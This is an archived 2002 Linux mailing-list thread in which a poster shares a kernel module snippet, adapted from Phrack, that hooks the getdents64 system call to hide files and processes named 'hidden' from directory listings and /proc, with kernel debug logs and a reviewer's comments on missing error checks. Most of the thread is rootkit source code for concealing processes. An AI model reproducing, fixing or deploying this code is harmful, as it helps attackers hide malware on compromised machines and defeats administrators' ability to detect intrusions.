let's forget about the error checking and the printk's and the fact
that is function by it's own is useless..
I'll put some stuff into it tho. inline.
On Thu, Aug 29, 2002 at 03:04:37PM +0300, Muli Ben-Yehuda wrote:
> On Thu, Aug 29, 2002 at 02:57:46PM +0300, Guy Cohen wrote:
> > Here's a little modify (just a bit) snipplet from phreak about
> > how to hide files and process. Canany one answer me why
> > does it exit after it finds the first hidden process, and don't go
> > on to hide the second hidden porcess?
>
> Nope, you provided incomplete and buggy code. Please post the entire
> snippet if you want meaningful comments.
>
> Comments inline.
>
> > Thanks,
> >
> > Guy
> >
> > <+++>
more code:
> > char hidden[] = "hidden";
char mtroj[] = "hidden";
/*convert a string to number*/
int myatoi(char *str)
{
int res = 0;
int mul = 1;
char *ptr;
for (ptr = str + strlen(str) - 1; ptr >= str; ptr--) {
if (*ptr < '0' || *ptr > '9')
return (-1);
res += (*ptr - '0') * mul;
mul *= 10;
}
return (res);
}
/*get task structure from PID*/
struct task_struct *get_task(pid_t pid)
{
struct task_struct *p = current;
do {
if (p->pid == pid)
return p;
p = p->next_task;
}
while (p != current);
return NULL;
}
/*check whether we need to hide this process*/
int invisible(pid_t pid )
{
struct task_struct *task = get_task(pid);
if (task) {
printk("IS IT?: %s\n", task->comm);
if(strstr(task->comm, (char*)&mtroj )) {
printk("GOT IT IT'S: %s\n", task->comm);
return 1; }
}
return 0;
}
> > [...]
> > int n_getdents64(unsigned int fd, struct dirent64 *dirp, unsigned int count)
> > {
> > unsigned int tmp, n;
> > int t, proc=0;
> > struct inode *dinode;
> > struct dirent64 *dirp2, *dirp3;
> >
> > tmp = (*orig_getdents64) (fd, dirp, count);
> >
> > dinode = current->files->fd[fd]->f_dentry->d_inode;
> >
> > if( dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) &&
> > MINOR(dinode->i_dev) == 2)
> > proc = 1;
printk(KERN_DEBUG "+++\n");
printk(KERN_DEBUG "dinode->i_ino(%d) == %d\n",dinode->i_ino,PROC_ROOT_INO);
printk(KERN_DEBUG "!MAJOR(dinode->i_dev) == %d\n",!MAJOR(dinode->i_dev));
printk(KERN_DEBUG "MINOR(dinode->i_dev) == %d\n",MINOR(dinode->i_dev));
printk(KERN_DEBUG "tmp = %d\n", tmp);
> >
> > /*dinode is the inode of the required directory*/
> > if (tmp > 0)
> > {
> > /*dirp2 is a new dirent structure*/
> > dirp2 = (struct dirent64 *) kmalloc(tmp, GFP_KERNEL);
>
> BAD MISTAKE, no checking for malloc failure.
Yes yes, but i love to seg fault in the kernel :)
>
> > /*copy original dirent structure to dirp2*/
> > copy_from_user(dirp2, dirp, tmp);
>
> And no checkinf for copy_form_user failing.
>
>
> > /*dirp3 points to dirp2*/
> > dirp3 = dirp2;
> >
> > t = tmp;
> >
> > while (t > 0)
> > {
> > n = dirp3->d_reclen;
> > t -= n;
> >
<lets say /*>
> > /*check if current filename is the name of the file we want to hide*/
> > /* or pid */
> > if ( (strstr((char *) &(dirp3->d_name), (char *) &hidden) != NULL) ||
> > (proc && invisible(myatoi(dirp3->d_name))))
>
> where is invisible defined? myatoi?
<because i don't care about hidden files atm */
if (proc && invisible(myatoi(dirp3->d_name)))
>
> > {
> > /*modify dirent struct if necessary*/
> > if (t != 0)
> > memmove(dirp3, (char *) dirp3 + dirp3->d_reclen, t);
>
> this looks... suspicious.
This is the main event :)
>
> > else
> > dirp3->d_off = 1024;
> > tmp -= n;
> > }
> >
> > if (t != 0)
> > dirp3 = (struct dirent64 *) ((char *) dirp3 + dirp3->d_reclen);
> >
> > }
> >
> > copy_to_user(dirp, dirp2, tmp);
>
> Need to check here as well.
>
> > kfree(dirp2);
> > }
> > return tmp;
> > }
> >
> > <--->
> >
> > If you want to see a little KERN_DEBUG:
>
> There's not a signle printk in the snippet above. Where is this log
> from?
>
> > ps was run after
> > /hiddensleep &
> > /hiddensleep2 &
> >
> > [...]
> > Aug 29 14:40:22 arpo kernel: IS IT?: hiddensleep
> > Aug 29 14:40:22 arpo kernel: GOT IT, IT'S: hiddensleep
> > Aug 29 14:40:22 arpo kernel: tmp = 456, t = 48, n = 24
> > Aug 29 14:40:22 arpo kernel: IS IT?: ps
> > Aug 29 14:40:22 arpo kernel: IS IT?: ps
> > Aug 29 14:40:22 arpo kernel: IS IT?: less
> > Aug 29 14:40:22 arpo kernel: +++
> > Aug 29 14:40:22 arpo kernel: dinode->i_ino(1) == 1
> > Aug 29 14:40:22 arpo kernel: !MAJOR(dinode->i_dev) == 1
> > Aug 29 14:40:23 arpo kernel: MINOR(dinode->i_dev) == 2
> > Aug 29 14:40:23 arpo kernel: tmp = 0
> > [end]
> >
> >
> > BTW: I know some of you prolly wrote a better module that does this
> > and even more.. I'm not interesting in getting its source (it's just too easy),
> > I want to keep working on mine.
>
> Sure, but do it right...
Thanks
Guy
--
Unix Administration, | http://www.unixadmin.co.il
locally and remotely. | [EMAIL PROTECTED]
Planning, installation, | Phone: 972-3-6201373
support & upgrades. | Location: Unrestricted
=================================================================
To unsubscribe, send mail to [EMAIL PROTECTED] with
the word "unsubscribe" in the message body, e.g., run the command
echo unsubscribe | mail [EMAIL PROTECTED]
